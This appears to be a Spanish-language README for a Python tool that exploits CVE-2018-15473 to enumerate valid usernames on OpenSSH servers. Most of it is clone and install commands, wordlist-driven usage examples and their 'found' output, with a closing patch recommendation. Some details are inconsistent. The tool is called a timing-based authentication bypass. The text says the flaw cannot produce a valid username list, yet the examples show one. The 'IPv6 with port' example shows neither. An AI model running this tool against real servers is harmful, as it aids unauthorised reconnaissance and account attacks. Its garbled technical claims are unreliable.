
Herramienta de enumeración de nombres de usuario SSH que explota CVE-2018-15473 para identificar usuarios válidos en servidores OpenSSH mediante una omisión de autenticación basada en tiempos.
El servidor OpenSSH no retrasa el procesamiento de un usuario inválido antes de analizar completamente un paquete que contiene una solicitud. Esta vulnerabilidad está relacionada con auth2-gss.c, auth2-hostbased.c y auth2-pubkey.c.
Aunque esta vulnerabilidad no puede utilizarse para generar una lista válida de nombres de usuario, aún se puede emplear para enumerar y adivinar nombres de usuario.
OpenSSH <= 7.7
openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27
Es posible que necesite instalar el paquete equivalente a openssl-dev de su distribución.
# Nota: Si está instalando en Kali, puede omitir la instalación de pip y solo seguir los pasos 1, 2 y 3, ya que paramiko ya está presente.
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt
# O descárguelo e instálelo con el siguiente comando
pipenv install -r requirements.txt # si es tan moderno como eso
chmod u+x ssh-username-enum.py
Ejemplo 1: Enumeración de un solo usuario
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!
Ejemplo 2: Enumeración de múltiples usuarios con 10 hilos (por defecto 4 hilos)
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
etc.
Ejemplo 3: Dirección IPv6 con puerto SSH especificado
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
etc.
Se recomienda a los usuarios actualizar a una versión no afectada. El proyecto OpenBSD ha publicado una corrección de código fuente en el siguiente enlace: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/